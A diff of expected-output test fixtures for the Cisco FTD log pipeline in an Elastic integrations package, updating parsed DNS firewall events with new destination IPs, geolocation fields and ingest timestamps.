+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1736,7 +1769,7 @@
 "prefilter_policy": "Default Prefilter Policy",
 "nap_policy": "Balanced Security and Connectivity",
 "ingress_zone": "input-zone",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_port": "39541",
 "src_ip": "10.0.1.20",
@@ -1774,23 +1807,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 180, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1838,7 +1874,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { 
@@ -1847,8 +1883,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351813895Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", + "ingested": "2021-12-09T13:32:56.096971200Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1878,7 +1914,7 @@ "dns_query": "laskdfjlaksdf.elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
@@ -1921,23 +1957,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 108, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1985,7 +2024,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { 
@@ -1994,8 +2033,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351815726Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", + "ingested": "2021-12-09T13:32:56.096977300Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2025,7 +2064,7 @@ "dns_query": "ns-1168.awsdns-18.org", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
@@ -2067,23 +2106,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 162, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2131,7 +2173,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { 
@@ -2140,8 +2182,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351817513Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", + "ingested": "2021-12-09T13:32:56.096983500Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2171,7 +2213,7 @@ "dns_query": "_http._tcp.security.ubuntu.com", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
@@ -2213,24 +2255,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2278,7 +2323,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -2287,8 +2332,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351819338Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", + "ingested": "2021-12-09T13:32:56.096989700Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2319,7 +2364,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
@@ -2361,24 +2406,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2426,7 +2474,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -2435,8 +2483,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351821378Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", + "ingested": "2021-12-09T13:32:56.096996Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2466,7 +2514,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
@@ -2507,24 +2555,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2572,7 +2623,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -2581,8 +2632,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351823157Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", + "ingested": "2021-12-09T13:32:56.097002100Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2612,7 +2663,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
@@ -2653,24 +2704,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2718,7 +2772,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -2727,8 +2781,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351824930Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", + "ingested": "2021-12-09T13:32:56.097006900Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2758,7 +2812,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
@@ -2798,24 +2852,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 131, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2863,7 +2920,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -2872,8 +2929,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351826720Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", + "ingested": "2021-12-09T13:32:56.097011800Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2906,7 +2963,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "46093", "src_ip": "10.0.1.20", 
@@ -2943,24 +3000,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -3008,7 +3068,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -3017,8 +3077,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351828609Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", + "ingested": "2021-12-09T13:32:56.097017800Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -3049,7 +3109,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json index 21609e8be8e..5271161c37c 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json @@ -31,7 +31,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.767202337Z", + "ingested": "2021-12-09T13:33:00.751642700Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-07-19T09:06:46.767208026Z", + "ingested": "2021-12-09T13:33:00.751651600Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json index 5245c8d8a86..60dcd209115 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json @@ -29,7 +29,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853583009Z", + "ingested": "2021-12-09T13:33:00.917237300Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, 
@@ -66,7 +66,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853589347Z", + "ingested": "2021-12-09T13:33:00.917245300Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, @@ -103,7 +103,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853591547Z", + "ingested": "2021-12-09T13:33:00.917254100Z", "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00", "code": "" }, @@ -140,7 +140,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853593458Z", + "ingested": "2021-12-09T13:33:00.917259700Z", "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00", "code": "" }, @@ -177,7 +177,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853595280Z", + "ingested": "2021-12-09T13:33:00.917265Z", "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00", "code": "" }, @@ -214,7 +214,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853597076Z", + "ingested": "2021-12-09T13:33:00.917270200Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00", "code": "" }, 
